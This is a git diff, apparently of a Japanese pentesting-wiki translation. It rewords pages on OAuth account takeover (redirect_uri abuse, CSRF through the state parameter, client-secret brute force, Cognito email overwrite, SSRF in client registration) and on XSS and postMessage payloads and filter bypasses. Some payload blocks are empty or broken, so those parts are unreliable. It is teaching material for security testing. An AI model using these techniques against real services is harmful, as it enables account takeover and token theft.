@@ -19,10 +19,10 @@ OAuth 2.0フレームワーク内の以下のコンポーネントを理解す
 - **response_type**: **要求されるトークンのタイプ**を指定する値、例:`code`。
 - **scope**: `client application`が`resource owner`から要求している**アクセスレベル**。
 - **redirect_uri**: **ユーザーが認可後にリダイレクトされるURL**。これは通常、事前に登録されたリダイレクトURLと一致する必要があります。
-- **state**: **ユーザーが認可サーバーにリダイレクトされる際にデータを保持するためのパラメータ**。そのユニーク性は、**CSRF保護メカニズム**として機能するために重要です。
+- **state**: **ユーザーが認可サーバーにリダイレクトされる際にデータを維持するためのパラメータ**。そのユニーク性は、**CSRF保護メカニズム**として機能するために重要です。
 - **grant_type**: **グラントタイプと返されるトークンのタイプ**を示すパラメータ。
-- **code**: `authorization server`からの認可コードで、`client application`が`access_token`を取得するために`client_id`と`client_secret`と共に使用します。
-- **access_token**: **クライアントアプリケーションが`resource owner`の代わりにAPIリクエストに使用するトークン**。
+- **code**: `authorization server`からの認可コードで、`client application`が`access_token`を取得するために`client_id`および`client_secret`と共に使用します。
+- **access_token**: **リソースオーナーの代わりにAPIリクエストに使用されるトークン**。
 - **refresh_token**: アプリケーションが**ユーザーに再度プロンプトを表示することなく新しい`access_token`を取得する**ことを可能にします。
 
 ### Flow
@@ -44,7 +44,7 @@ https://socialmedia.com/auth
 ```
 https://example.com?code=uniqueCode123&state=randomString123
 ```
-5. https://example.com はこの `code` を使用し、`client_id` と `client_secret` と共に、あなたの代わりに `access_token` を取得するためにサーバーサイドリクエストを行い、あなたが同意した権限へのアクセスを可能にします:
+5. https://example.com はこの `code` を利用し、`client_id` と `client_secret` と共に、あなたの代わりに `access_token` を取得するためのサーバーサイドリクエストを行い、あなたが同意した権限へのアクセスを可能にします:
 ```
 POST /oauth/access_token
 Host: socialmedia.com
@@ -54,7 +54,7 @@ Host: socialmedia.com
 
 ## 脆弱性 
 
-### オープンリダイレクトURI 
+### オープンリダイレクト_uri 
 
 `redirect_uri` はOAuthおよびOpenIDの実装においてセキュリティにとって重要であり、認可後に認可コードなどの機密データが送信される場所を指示します。誤って設定されると、攻撃者がこれらのリクエストを悪意のあるサーバーにリダイレクトさせ、アカウントの乗っ取りを可能にすることがあります。
 
@@ -66,34 +66,34 @@ OpenIDサーバーをターゲットにする場合、ディスカバリーエ
 
 ### リダイレクト実装におけるXSS 
 
-このバグバウンティレポート [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) で述べられているように、リダイレクト **URLがサーバーの応答に反映される可能性があり**、**XSSに対して脆弱である**かもしれません。テストするための可能なペイロード:
+このバグバウンティレポート [https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html](https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html) で述べられているように、リダイレクト **URLがサーバーのレスポンスに反映される可能性があり**、**XSSに対して脆弱である**可能性があります。テストするための可能なペイロード:
 ```
 https://app.victim.com/login?redirectUrl=https://app.victim.com/dashboard
test

 ```
 ### CSRF - 不適切な状態パラメータの取り扱い 
 
-OAuthの実装において、**`state`パラメータ**の誤用または省略は、**クロスサイトリクエストフォージェリ(CSRF)**攻撃のリスクを大幅に増加させる可能性があります。この脆弱性は、`state`パラメータが**使用されていない、静的な値として使用されている、またはユーザーのセッションと適切に検証または関連付けられていない**場合に発生し、攻撃者がCSRF保護を回避できるようになります。
+OAuthの実装において、**`state`パラメータ**の誤用または省略は、**クロスサイトリクエストフォージェリ(CSRF)**攻撃のリスクを大幅に増加させる可能性があります。この脆弱性は、`state`パラメータが**使用されていない、静的な値として使用されている、またはログイン中にユーザーセッションと適切に検証または関連付けられていない**場合に発生し、攻撃者がCSRF保護を回避できるようになります。
 
-攻撃者は、認証プロセスを傍受して自分のアカウントを被害者のアカウントにリンクさせることでこれを悪用し、攻撃者のほぼ完了したoauthフローを使用してユーザーにログインさせることによって、潜在的な**アカウント乗っ取り**を引き起こす可能性があります。これは、OAuthが**認証目的**で使用されるアプリケーションでは特に重要です。
+攻撃者は、認可プロセスを傍受して自分のアカウントを被害者のアカウントにリンクさせることでこれを悪用し、攻撃者に属するほぼ完了したoauthフローでユーザーがログインすることにより、潜在的な**アカウント乗っ取り**を引き起こす可能性があります。これは、OAuthが**認証目的**で使用されるアプリケーションでは特に重要です。
 
-この脆弱性の実例は、さまざまな**CTFチャレンジ**や**ハッキングプラットフォーム**で文書化されており、その実際の影響を強調しています。この問題は、**Slack**、**Stripe**、**PayPal**などのサードパーティサービスとの統合にも及び、攻撃者が通知や支払いを自分のアカウントにリダイレクトできる可能性があります。
+この脆弱性の実例は、さまざまな**CTFチャレンジ**や**ハッキングプラットフォーム**で文書化されており、その実際の影響を強調しています。この問題は、攻撃者が通知や支払いを自分のアカウントにリダイレクトできる**Slack**、**Stripe**、**PayPal**などのサードパーティサービスとの統合にも及びます。
 
 **`state`パラメータ**の適切な取り扱いと検証は、CSRFから保護し、OAuthフローを安全に保つために重要です。
 
 ### アカウント乗っ取り前 
 
-1. **アカウント作成時のメール確認なし**: 攻撃者は被害者のメールを使用して事前にアカウントを作成できます。被害者が後にサードパーティサービスを使用してログインすると、アプリケーションが誤ってこのサードパーティアカウントを攻撃者の事前作成アカウントにリンクさせ、無許可のアクセスを引き起こす可能性があります。
-2. **緩いOAuthメール確認の悪用**: 攻撃者は、メールを確認しないOAuthサービスを悪用し、自分のサービスに登録した後、アカウントのメールを被害者のものに変更することができます。この方法も、最初のシナリオと同様に無許可のアカウントアクセスのリスクを伴いますが、異なる攻撃ベクターを通じて行われます。
+1. **アカウント作成時のメール確認なし**: 攻撃者は被害者のメールを使用して事前にアカウントを作成できます。被害者が後にサードパーティサービスを使用してログインすると、アプリケーションはこのサードパーティアカウントを攻撃者の事前作成アカウントに誤ってリンクさせ、無許可のアクセスを引き起こす可能性があります。
+2. **緩いOAuthメール確認の悪用**: 攻撃者は、メールを確認しないOAuthサービスを利用して、自分のサービスに登録し、その後アカウントのメールを被害者のものに変更することで悪用する可能性があります。この方法も、最初のシナリオと同様に無許可のアカウントアクセスのリスクを伴いますが、異なる攻撃ベクターを通じてです。
 
 ### 秘密の開示 
 
-秘密のOAuthパラメータを特定し保護することは重要です。**`client_id`**は安全に開示できますが、**`client_secret`**を開示することは重大なリスクを伴います。`client_secret`が漏洩すると、攻撃者はアプリケーションのアイデンティティと信頼を悪用して**ユーザーの`access_tokens`**やプライベート情報を**盗む**ことができます。
+秘密のOAuthパラメータを特定し保護することは重要です。**`client_id`**は安全に開示できますが、**`client_secret`**を明らかにすることは重大なリスクを伴います。`client_secret`が侵害されると、攻撃者はアプリケーションのアイデンティティと信頼を悪用して**ユーザーの`access_tokens`**やプライベート情報を**盗む**ことができます。
 
-一般的な脆弱性は、アプリケーションが認証`code`を`access_token`に交換する際に、クライアント側ではなくサーバー側で誤って処理する場合に発生します。この誤りは`client_secret`の露出を引き起こし、攻撃者がアプリケーションの名義で`access_tokens`を生成できるようにします。さらに、ソーシャルエンジニアリングを通じて、攻撃者はOAuth認証に追加のスコープを追加することで権限をエスカレートし、アプリケーションの信頼された地位をさらに悪用することができます。
+一般的な脆弱性は、アプリケーションが認可`code`を`access_token`に交換する際に、クライアント側ではなくサーバー側で誤って処理する場合に発生します。この誤りは`client_secret`の露出を引き起こし、攻撃者がアプリケーションの名義で`access_tokens`を生成できるようにします。さらに、ソーシャルエンジニアリングを通じて、攻撃者はOAuth認可に追加のスコープを追加することで権限をエスカレートし、アプリケーションの信頼された地位をさらに悪用することができます。
 
 ### クライアントシークレットブルートフォース
 
-サービスプロバイダーのアイデンティティプロバイダーに対して**クライアントシークレットをブルートフォース**し、アカウントを盗む試みを行うことができます。\
+サービスプロバイダーのクライアントシークレットをブルートフォースしてアカウントを盗むことを試みることができます。\
 ブルートフォースのリクエストは次のようになる可能性があります:
 ```
 POST /token HTTP/1.1
@@ -114,11 +114,11 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 
 ### Everlasting Authorization Code
 
-**認可コードは、攻撃者がそれを盗んで使用できる時間ウィンドウを制限するために、しばらくの間だけ存在する必要があります**。
+**認証コードは、攻撃者がそれを盗んで使用できる時間ウィンドウを制限するために、一定の時間だけ存在するべきです**。
 
 ### Authorization/Refresh Token not bound to client
 
-**認可コードを取得し、異なるクライアントで使用できる場合、他のアカウントを乗っ取ることができます**。
+**認証コードを取得し、異なるクライアントで使用できる場合、他のアカウントを乗っ取ることができます**。
 
 ### Happy Paths, XSS, Iframes & Post Messages to leak code & state values
 
@@ -126,7 +126,7 @@ code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=au
 
 ### AWS Cognito 
 
-このバグバウンティレポートでは、[**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**がユーザーに返す**トークン**が**ユーザーデータを上書きするのに十分な権限を持っている可能性がある**ことがわかります。したがって、**異なるユーザーのメールアドレスにユーザーのメールアドレスを変更できる場合、他のアカウントを**乗っ取ることができるかもしれません。
+このバグバウンティレポートでは: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) **AWS Cognito**がユーザーに返す**トークン**は、**ユーザーデータを上書きするのに十分な権限を持っている可能性があります**。したがって、**異なるユーザーのメールアドレスにユーザーのメールアドレスを変更できる場合、他のアカウントを**乗っ取ることができるかもしれません。
 ```bash
 # Read info of the user
 aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
@@ -153,20 +153,20 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticat
 
 [**この書き込みで述べられているように**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts)、**トークン**(コードではなく)を受け取ることを期待するOAuthフローは、トークンがアプリに属しているかどうかを確認しない場合、脆弱である可能性があります。
 
-これは、**攻撃者**が自分のアプリケーションで**OAuthをサポートするアプリケーションを作成し、Facebookでログイン**(例えば)できるためです。そして、被害者が**攻撃者のアプリケーション**でFacebookにログインすると、攻撃者は**自分のアプリケーションに与えられたユーザーのOAuthトークンを取得し、それを使用して被害者のOAuthアプリケーションにログインすることができます**。
+これは、**攻撃者**が自分のアプリケーションで**FacebookでログインするOAuthをサポートするアプリケーション**を作成できるためです。そして、被害者が**攻撃者のアプリケーション**でFacebookにログインすると、攻撃者は**自分のアプリケーションに与えられたユーザーのOAuthトークンを取得し、それを使用して被害者のOAuthアプリケーションにログインすることができます**。
 
 > [!CAUTION]
-> したがって、攻撃者がユーザーに自分のOAuthアプリケーションへのアクセスを取得することに成功すれば、トークンを期待しているアプリケーションで被害者のアカウントを乗っ取ることができるでしょう。
+> したがって、攻撃者がユーザーに自分のOAuthアプリケーションへのアクセスを取得させることに成功すれば、トークンを期待しているアプリケーションで被害者のアカウントを乗っ取ることができます。
 
 ### Two links & cookie 
 
-[**この書き込みによると**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)、被害者が攻撃者のホストを指す**returnUrl**を持つページを開くことが可能でした。この情報は**クッキー(RU)**に**保存され**、**後のステップ**で**プロンプト**が**ユーザー**にその攻撃者のホストへのアクセスを許可するかどうかを**尋ねます**。
+[**この書き込みによると**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f)、被害者が攻撃者のホストを指す**returnUrl**を持つページを開くようにすることが可能でした。この情報は**クッキー(RU)**に**保存され**、**後のステップ**で**プロンプト**が**ユーザー**にその攻撃者のホストへのアクセスを許可するかどうかを**尋ねます**。
 
-このプロンプトを回避するために、**Oauthフロー**を開始するためのタブを開き、このRUクッキーを**returnUrl**を使用して設定し、プロンプトが表示される前にタブを閉じ、新しいタブをその値なしで開くことが可能でした。これにより、**プロンプトは攻撃者のホストについて通知しませんが、クッキーはそれに設定されるため、**トークンはリダイレクトで攻撃者のホストに送信されます**。
+このプロンプトを回避するために、**returnUrl**を使用してこのRUクッキーを設定する**Oauthフロー**を開始するタブを開き、プロンプトが表示される前にタブを閉じ、新しいタブをその値なしで開くことが可能でした。そうすると、**プロンプトは攻撃者のホストについて通知しませんが、クッキーはそれに設定されるため、**トークンはリダイレクトで攻撃者のホストに送信されます**。
 
 ### Prompt Interaction Bypass 
 
-[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、一部のOAuth実装では、**`prompt`** GETパラメータをNone(**`&prompt=none`**)として指定することで、ユーザーがプラットフォームに既にログインしている場合に、ウェブ上で与えられたアクセスを確認するように求められないようにすることができます。
+[**このビデオで説明されているように**](https://www.youtube.com/watch?v=n9x7_J_a_7Q)、一部のOAuth実装では、**`prompt`** GETパラメータをNone(**`&prompt=none`**)として指定することで、ユーザーがすでにプラットフォームにログインしている場合に、ウェブ上で与えられたアクセスを確認するように求められないようにすることができます。
 
 ### response_mode
 
@@ -188,7 +188,7 @@ https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-unauthenticat
 1. 被害者が攻撃者のウェブページにアクセスします
 2. 被害者が悪意のあるリンクを開き、オープナーが`response_type=id_token,code&prompt=none`を追加パラメータとして使用してGoogle OAuthフローを開始します。**リファラーは攻撃者のウェブサイト**です。
 3. オープナーで、プロバイダーが被害者を認可すると、`redirect_uri`パラメータの値(被害者のウェブ)に30Xコードで戻します。これにより、攻撃者のウェブサイトがリファラーに残ります。
-4. 被害者の**ウェブサイトはリファラーに基づいてオープンリダイレクトをトリガーし**、被害者のユーザーを攻撃者のウェブサイトにリダイレクトします。**`respose_type`**が**`id_token,code`**であったため、コードはURLの**フラグメント**で攻撃者に返され、被害者のサイトを介してGoogleのアカウントを乗っ取ることが可能になります。
+4. 被害者の**ウェブサイトはリファラーに基づいてオープンリダイレクトをトリガーし**、被害者のユーザーを攻撃者のウェブサイトにリダイレクトします。**`respose_type`**が**`id_token,code`**であったため、コードはURLの**フラグメント**で攻撃者に返され、被害者のサイトを介してGoogleのアカウントを乗っ取ることができます。
 
 ### SSRFs parameters 
 
@@ -198,22 +198,22 @@ OAuthにおける動的クライアント登録は、特に**サーバーサイ
 
 **重要なポイント:**
 
-- **動的クライアント登録**は通常`/register`にマッピングされ、`client_name`、`client_secret`、`redirect_uris`、ロゴやJSON Web Key Sets(JWKs)のURLなどの詳細をPOSTリクエストで受け入れます。
-- この機能は、**RFC7591**および**OpenID Connect Registration 1.0**に記載された仕様に従い、SSRFに対して脆弱なパラメータを含む可能性があります。
+- **動的クライアント登録**は通常`/register`にマッピングされ、`client_name`、`client_secret`、`redirect_uris`、およびPOSTリクエストを介してロゴやJSON Web Key Sets(JWKs)のURLなどの詳細を受け入れます。
+- この機能は、**RFC7591**および**OpenID Connect Registration 1.0**に記載された仕様に準拠しており、SSRFに対して脆弱なパラメータを含んでいます。
 - 登録プロセスは、いくつかの方法でサーバーをSSRFにさらす可能性があります:
 - **`logo_uri`**:サーバーによって取得される可能性のあるクライアントアプリケーションのロゴのURLで、SSRFを引き起こすか、URLが不適切に処理された場合にXSSを引き起こす可能性があります。
 - **`jwks_uri`**:クライアントのJWKドキュメントへのURLで、悪意を持って作成された場合、サーバーが攻撃者が制御するサーバーへの外部リクエストを行う原因となる可能性があります。
 - **`sector_identifier_uri`**:サーバーが取得する可能性のある`redirect_uris`のJSON配列を参照し、SSRFの機会を生み出します。
-- **`request_uris`**:クライアントのために許可されたリクエストURIをリストし、サーバーが認可プロセスの開始時にこれらのURIを取得する場合に悪用される可能性があります。
+- **`request_uris`**:クライアントのために許可されたリクエストURIのリストで、サーバーが認可プロセスの開始時にこれらのURIを取得する場合に悪用される可能性があります。
 
 **悪用戦略:**
 
 - SSRFは、`logo_uri`、`jwks_uri`、または`sector_identifier_uri`のパラメータに悪意のあるURLを持つ新しいクライアントを登録することでトリガーされる可能性があります。
-- `request_uris`を介した直接的な悪用はホワイトリスト制御によって軽減される可能性がありますが、事前に登録された攻撃者が制御する`request_uri`を提供することで、認可フェーズ中にSSRFを促進することができます。
+- `request_uris`を介った直接的な悪用はホワイトリスト制御によって軽減される可能性がありますが、事前に登録された攻撃者が制御する`request_uri`を提供することで、認可フェーズ中にSSRFを促進することができます。
 
 ## OAuth providers Race Conditions
 
-テストしているプラットフォームがOAuthプロバイダーである場合、[**レース条件の可能性をテストするためにこれを読んでください**](race-condition.md)。
+テストしているプラットフォームがOAuthプロバイダーである場合、[**レースコンディションの可能性をテストするためにこれを読んでください**](race-condition.md)。
 
 ## Mutable Claims Attack
 
@@ -226,15 +226,15 @@ OAuthでは、subフィールドがユーザーを一意に識別しますが、
 
 ## Client Confusion Attack
 
-**クライアント混乱攻撃**では、OAuthインプリシットフローを使用するアプリケーションが、最終的なアクセストークンが特定のクライアントIDのために生成されたものであることを確認しません。攻撃者は、GoogleのOAuthインプリシットフローを使用する公開ウェブサイトを設定し、何千人ものユーザーを騙してログインさせ、その結果、攻撃者のサイト向けに意図されたアクセストークンを収集します。これらのユーザーが、トークンのクライアントIDを検証しない別の脆弱なウェブサイトにアカウントを持っている場合、攻撃者は収集したトークンを再利用して被害者を偽装し、アカウントを乗っ取ることができます。
+**クライアント混乱攻撃**では、OAuthインプリシットフローを使用するアプリケーションが、最終的なアクセストークンが特定のクライアントIDのために生成されたものであることを確認しません。攻撃者は、GoogleのOAuthインプリシットフローを使用する公開ウェブサイトを設定し、何千人ものユーザーをログインさせ、攻撃者のサイト向けに意図されたアクセストークンを収集します。これらのユーザーが、トークンのクライアントIDを検証しない別の脆弱なウェブサイトにアカウントを持っている場合、攻撃者は収集したトークンを再利用して被害者を偽装し、アカウントを乗っ取ることができます。
 
 ## Scope Upgrade Attack
 
-**Authorization Code Grant**タイプは、ユーザーデータを送信するための安全なサーバー間通信を含みます。しかし、**Authorization Server**がアクセストークンリクエストのスコープパラメータを暗黙的に信頼する場合(RFCで定義されていないパラメータ)、悪意のあるアプリケーションがより高いスコープを要求することで認可コードの権限をアップグレードする可能性があります。**アクセストークン**が生成された後、**リソースサーバー**はそれを検証する必要があります:JWTトークンの場合、これはJWT署名を確認し、client_idやscopeなどのデータを抽出することを含みます。一方、ランダム文字列トークンの場合、サーバーは認可サーバーにクエリを行い、トークンの詳細を取得する必要があります。
+**Authorization Code Grant**タイプは、ユーザーデータを送信するための安全なサーバー間通信を含みます。しかし、**Authorization Server**がアクセストークンリクエストのスコープパラメータを暗黙的に信頼する場合(RFCで定義されていないパラメータ)、悪意のあるアプリケーションがより高いスコープを要求することで認可コードの権限をアップグレードできる可能性があります。**アクセストークン**が生成された後、**リソースサーバー**はそれを検証する必要があります:JWTトークンの場合、これはJWT署名を確認し、client_idやscopeなどのデータを抽出することを含みます。一方、ランダム文字列トークンの場合、サーバーは認可サーバーにクエリを行い、トークンの詳細を取得する必要があります。
 
 ## Redirect Scheme Hijacking
 
-モバイルOAuth実装では、アプリが**カスタムURIスキーム**を使用して認可コードを受け取るリダイレクトを受け取ります。しかし、複数のアプリがデバイス上で同じスキームを登録できるため、正当なクライアントのみがリダイレクトURIを制御しているという仮定が破られます。例えば、Androidでは、`com.example.app://`のようなIntent URIが、アプリのintent-filterで定義されたスキームとオプションのフィルターに基づいてキャッチされます。Androidのインテント解決は広範囲にわたる可能性があるため(特にスキームのみが指定されている場合)、攻撃者は巧妙に作成されたインテントフィルターを持つ悪意のあるアプリを登録して認可コードをハイジャックすることができます。これにより、ユーザーの相互作用(複数のアプリがインテントを処理する資格がある場合)または過度に特定的なフィルターを悪用するバイパステクニックを通じて**アカウントの乗っ取り**が可能になります。
+モバイルOAuth実装では、アプリが**カスタムURIスキーム**を使用して認可コードを受け取るリダイレクトを受け取ります。しかし、複数のアプリがデバイス上で同じスキームを登録できるため、正当なクライアントのみがリダイレクトURIを制御しているという仮定が破られます。たとえば、Androidでは、`com.example.app://`のようなIntent URIがスキームとアプリのintent-filterで定義されたオプションフィルターに基づいてキャッチされます。Androidのインテント解決は広範囲にわたる可能性があるため(特にスキームのみが指定されている場合)、攻撃者は巧妙に作成されたインテントフィルターを持つ悪意のあるアプリを登録して認可コードをハイジャックできます。これにより、ユーザーの操作(複数のアプリがインテントを処理する資格がある場合)や、Ostorlabの評価フローチャートで詳述されているような過度に特定的なフィルターを悪用するバイパステクニックを通じて**アカウントの乗っ取り**が可能になります。
 
 ## References
 
diff --git a/src/pentesting-web/open-redirect.md b/src/pentesting-web/open-redirect.md
index a698257e6..29aa4b7fd 100644
--- a/src/pentesting-web/open-redirect.md
+++ b/src/pentesting-web/open-redirect.md
@@ -7,6 +7,7 @@
 
 ### localhostまたは任意のドメインへのリダイレクト
 
+
 {{#ref}}
 ssrf-server-side-request-forgery/url-format-bypass.md
 {{#endref}}
diff --git a/src/pentesting-web/postmessage-vulnerabilities/README.md b/src/pentesting-web/postmessage-vulnerabilities/README.md
index 5e2626d51..f90830ce4 100644
--- a/src/pentesting-web/postmessage-vulnerabilities/README.md
+++ b/src/pentesting-web/postmessage-vulnerabilities/README.md
@@ -32,12 +32,12 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
 ```
 **targetOrigin** は '\*' または _https://company.com_ のような URL である可能性があります。\
 **第二のシナリオ**では、**メッセージはそのドメインにのみ送信される**(ウィンドウオブジェクトのオリジンが異なっていても)。\
-**ワイルドカード**が使用されると、**メッセージは任意のドメインに送信される可能性があり**、ウィンドウオブジェクトのオリジンに送信されます。
+**ワイルドカード**が使用される場合、**メッセージは任意のドメインに送信される可能性があり**、ウィンドウオブジェクトのオリジンに送信されます。
 
-### iframe 攻撃 & **targetOrigin** のワイルドカード
+### iframe の攻撃と **targetOrigin** におけるワイルドカード
 
-[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)で説明されているように、**iframed** 可能なページ(`X-Frame-Header` 保護なし)を見つけ、**ワイルドカード**(\*)を使用して **postMessage** 経由で **機密** メッセージを **送信している** 場合、**iframe** の **origin** を **変更** し、**機密** メッセージをあなたが制御するドメインに **漏洩** させることができます。\
-ページが iframed 可能でも、**targetOrigin** が **URL に設定されていてワイルドカードでない場合**、この **トリックは機能しません**。
+[**このレポート**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) で説明されているように、**iframed** 可能なページ(`X-Frame-Header` 保護なし)を見つけ、**ワイルドカード**(\*)を使用して **postMessage** 経由で **機密** メッセージを **送信している** 場合、**iframe** の **origin** を **変更** し、あなたが制御するドメインに **機密** メッセージを **漏洩** させることができます。\
+ページが iframed 可能であるが **targetOrigin** が **ワイルドカードではなく URL に設定されている** 場合、この **トリックは機能しません**。
 ```html
 
 
@@ -152,9 +153,10 @@ Then, you can **distinguish between** a **correctly** loaded page or page that h
 - **Inclusion Methods**: Frames
 - **Detectable Difference**: Page Content
 - **More info**:
-- **Summary:** ページが**機密**コンテンツを**返す**、またはユーザーによって**制御**可能な**コンテンツ**を返す場合。ユーザーは**負のケース**で**有効なJSコードを設定**し、各試行を**``**タグ、`.js`ファイル内、または**`javascript:`**プロトコルを使用した属性内に反映されます:
 
 - **``**タグの間に反映されている場合、たとえあなたの入力があらゆる種類の引用符の中にあっても、``を注入してこのコンテキストから**脱出**しようとすることができます。これは、**ブラウザが最初にHTMLタグを解析**し、その後にコンテンツを解析するため、あなたが注入した``タグがHTMLコード内にあることに気づかないからです。
-- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列から**退出**し、コードを**実行**し、JSコードを**再構築**する必要があります(エラーがある場合は実行されません):
+- **JS文字列内**に反映されていて、最後のトリックが機能しない場合は、文字列から**退出**し、**コードを実行**し、JSコードを**再構築**する必要があります(エラーがある場合は実行されません):
 - `'-alert(1)-'`
 - `';-alert(1)//`
 - `\';alert(1)//`
@@ -86,7 +86,8 @@ alert(1)
 #### Javascript Hoisting
 
 Javascript Hoistingは、**関数、変数、またはクラスを使用した後に宣言する機会を指し、未宣言の変数や関数を使用するXSSのシナリオを悪用できるようにします。**\
-**詳細については、次のページを確認してください:**
+**詳細については、次のページを確認してください:**
+
 
 {{#ref}}
 js-hoisting.md
@@ -96,17 +97,17 @@ js-hoisting.md
 
 いくつかのウェブページには、**実行する関数の名前をパラメータとして受け入れるエンドポイントがあります**。一般的な例として、`?callback=callbackFunc`のようなものがあります。
 
-ユーザーによって直接提供された何かが実行されようとしているかどうかを確認する良い方法は、**パラメータの値を変更すること**(例えば「Vulnerable」に)で、コンソールで次のようなエラーを探すことです:
+ユーザーによって直接提供された何かが実行されようとしているかどうかを確認する良い方法は、**パラメータの値を変更すること**(例えば「Vulnerable」に)で、コンソールで次のようなエラーを探すことです:
 
 ![](<../../images/image (711).png>)
 
-脆弱性がある場合、**値を送信するだけでアラートをトリガーできる**かもしれません: **`?callback=alert(1)`**。ただし、これらのエンドポイントは、**内容を検証して、文字、数字、ドット、アンダースコアのみを許可する**ことが非常に一般的です(**`[\w\._]`**)。
+脆弱性がある場合、**値を送信するだけでアラートをトリガーできる**かもしれません:**`?callback=alert(1)`**。ただし、これらのエンドポイントは、**コンテンツを検証して、文字、数字、ドット、アンダースコアのみを許可することが非常に一般的です**(**`[\w\._]`**)。
 
-しかし、その制限があっても、いくつかのアクションを実行することは依然として可能です。これは、有効な文字を使用して**DOM内の任意の要素にアクセスできるためです**:
+しかし、その制限があっても、いくつかのアクションを実行することは依然として可能です。これは、有効な文字を使用して**DOM内の任意の要素にアクセスできるためです**:
 
 ![](<../../images/image (747).png>)
 
-これに役立ついくつかの関数:
+これに役立ついくつかの関数:
 ```
 firstElementChild
 lastElementChild
@@ -134,7 +135,7 @@ dom-xss.md
 
 ### **ユニバーサルXSS**
 
-この種のXSSは**どこにでも**見つけることができます。これは、Webアプリケーションのクライアントのエクスプロイトだけでなく、**あらゆる** **コンテキスト**に依存します。この種の**任意のJavaScript実行**は、**RCE**を取得したり、クライアントやサーバーの**任意のファイルを読み取ったり**するために悪用されることさえあります。\
+この種のXSSは**どこにでも**見つけることができます。これは、Webアプリケーションのクライアントの悪用だけでなく、**あらゆる****コンテキスト**に依存します。この種の**任意のJavaScript実行**は、**RCE**を取得したり、クライアントやサーバーの**任意のファイルを読み取ったり**するために悪用されることもあります。\
 いくつかの**例**:
 
 {{#ref}}
@@ -152,7 +153,7 @@ server-side-xss-dynamic-pdf.md
 ## 生のHTML内に注入
 
 あなたの入力が**HTMLページ内に反映される**場合、またはこのコンテキストでHTMLコードをエスケープして注入できる場合、最初に行うべきことは、`<`を悪用して新しいタグを作成できるかどうかを確認することです: その**文字**を**反映**させて、それが**HTMLエンコード**されているか、**削除**されているか、または**変更なしで反映**されているかを確認してください。**最後のケースでのみ、このケースを悪用できるでしょう**。\
-この場合も、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)**を念頭に置いてください。**\
+この場合も、[**クライアントサイドテンプレートインジェクション**](../client-side-template-injection-csti.md)**を考慮してください。**\
 _**注: HTMLコメントは、\*\***\***\*`-->`\*\***\***\*または\*\***`--!>`\*\**を使用して閉じることができます。_
 
 この場合、ブラックリスト/ホワイトリストが使用されていない場合、次のようなペイロードを使用できます:
@@ -164,7 +165,7 @@ alert(1)
 
 ```
 しかし、タグ/属性のブラックリスト/ホワイトリストが使用されている場合、どのタグを作成できるかを**ブルートフォース**する必要があります。\
-どのタグが許可されているかを**特定したら**、見つかった有効なタグ内の**属性/イベントをブルートフォース**して、どのようにコンテキストを攻撃できるかを確認する必要があります。
+許可されているタグを**特定したら**、見つかった有効なタグ内の**属性/イベントをブルートフォース**して、どのようにコンテキストを攻撃できるかを確認する必要があります。
 
 ### タグ/イベントのブルートフォース
 
@@ -178,7 +179,7 @@ alert(1)
 ```
 ### ブラックリストバイパス
 
-もし何らかのブラックリストが使用されている場合、いくつかのくだらないトリックを使ってバイパスを試みることができます:
+もし何らかのブラックリストが使用されている場合、いくつかのくだらないトリックを使ってバイパスを試みることができます:
 ```javascript
 //Random capitalization
 
Newsletter popup

 ```
-[**こちら**](https://portswigger.net/research/xss-in-hidden-input-fields): **隠し属性**内で**XSSペイロード**を実行できますが、**犠牲者**に**キーの組み合わせ**を押すように**説得**する必要があります。Firefox Windows/Linuxではキーの組み合わせは**ALT+SHIFT+X**で、OS Xでは**CTRL+ALT+X**です。アクセスキー属性で異なるキーを使用して異なるキーの組み合わせを指定できます。ここにベクターがあります:
+[**こちら**](https://portswigger.net/research/xss-in-hidden-input-fields)から: **隠し属性**内で**XSSペイロード**を実行できますが、**犠牲者**に**キーの組み合わせ**を押すように**説得**する必要があります。FirefoxのWindows/Linuxではキーの組み合わせは**ALT+SHIFT+X**で、OS Xでは**CTRL+ALT+X**です。アクセスキー属性で異なるキーを使用して異なるキーの組み合わせを指定できます。ここがベクターです:
 ```html
 
 ```
@@ -432,7 +433,7 @@ onbeforetoggle="alert(2)" />
 
 ### ブラックリストバイパス
 
-このセクションでは、さまざまなエンコーディングを使用するトリックがすでに公開されています。**戻って、どこで使用できるかを学びましょう:**
+このセクションでは、異なるエンコーディングを使用するいくつかのトリックがすでに公開されています。**戻って、どこで使用できるかを学びましょう:**
 
 - **HTMLエンコーディング(HTMLタグ)**
 - **Unicodeエンコーディング(有効なJSコードになる可能性があります):** `\u0061lert(1)`
@@ -450,7 +451,7 @@ onbeforetoggle="alert(2)" />
 
 ### CSSガジェット
 
-もし、**非常に小さな部分**のウェブでXSSを見つけた場合、何らかのインタラクションが必要です(フッターの小さなリンクにonmouseover要素があるかもしれません)、その要素が占める**スペースを変更して**、リンクが発火する確率を最大化することを試みることができます。
